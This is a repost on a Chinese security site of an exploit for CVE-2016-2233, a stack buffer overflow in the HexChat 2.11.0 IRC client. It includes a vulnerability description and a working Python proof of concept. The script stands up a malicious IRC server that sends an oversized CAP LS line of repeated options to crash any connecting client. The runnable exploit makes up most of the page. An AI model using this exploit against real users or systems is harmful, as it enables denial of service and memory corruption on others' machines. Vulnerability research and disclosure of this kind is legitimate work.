首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow 来源：vfocus.net 作者：PizzaHatHacker 发布时间：2016-04-05   #!/usr/bin/python # #################### # Meta information # #################### # Exploit Title: Hexchat IRC client - CAP LS Handling Stack Buffer Overflow # Date: 2016-02-07 # Exploit Author: PizzaHatHacker # Vendor Homepage: https://hexchat.github.io/index.html # Software Link: https://hexchat.github.io/downloads.html # Version: 2.11.0 # Tested on: HexChat 2.11.0 & Linux (64 bits) + HexChat 2.10.2 & Windows 8.1 (64 bits) # CVE : CVE-2016-2233   ############################# # Vulnerability description # ############################# ''' Stack Buffer Overflow in src/common/inbound.c : void inbound_cap_ls (server *serv, char *nick, char *extensions_str, const message_tags_data *tags_data)   In this function, Hexchat IRC client receives the available extensions from the IRC server (CAP LS message) and constructs the request string to indicate later which one to use (CAP REQ message). This request string is stored in the fixed size (256 bytes) byte array 'buffer'. It has enough space for all possible options combined, BUT it will overflow if some options are repeated.   CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:P) CVSS Base Score : 7.5 Impact Subscore : 6.4 Exploitability Subscore : 10 '''   #################### # Proof of Concept # #################### ''' * Install Hexchat IRC Client * Run this Python script on a (server) machine * Connect to the server running the script * Results : Hexchat will crash (most probably access violation/segmentation fault) '''   import socket import sys import time   # Exploit configuration HOST = '' PORT = 6667 SERVERNAME = 'irc.example.com' OPTIONS = 'multi-prefix ' * 100 # 13*100 = 1300 bytes > 256 bytes   # Create server socket sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try:     sock.bind((HOST, PORT)) # Bind to port     sock.listen(0) # Start listening on socket           print 'Server listening, waiting for connection...'     conn, addr = sock.accept()           print 'Connected with ' + addr[0] + ':' + str(addr[1]) + ', sending packets...'     conn.send(':' + SERVERNAME + ' CAP * LS :' + OPTIONS + '\r\n')           # Wait and close socket     conn.recv(256)     sock.close()           print 'Done.'   except socket.error as msg:     print 'Network error : ' + str(msg[0]) + ' ' + msg[1]   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Xion Audio Player <= 1.5 (buil ·Hexchat IRC Client 2.11.0 - Di ·PHP 5.5.33 - Invalid Memory Wr ·PCMAN FTP Server 2.0.7 Buffer ·PHP 7.0.4/5.5.33 - SNMP Format ·Easy File Sharing HTTP SerEasy ·Apache Jetspeed Arbitrary File ·Internet Explorer - MSHTML!CSV ·LShell <= 0.9.15 - Remote Code ·Linux x86 - Disable ASLR by Se ·ATutor 2.2.1 Directory Travers ·MESS 0.154-3.1 Buffer Overflow   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved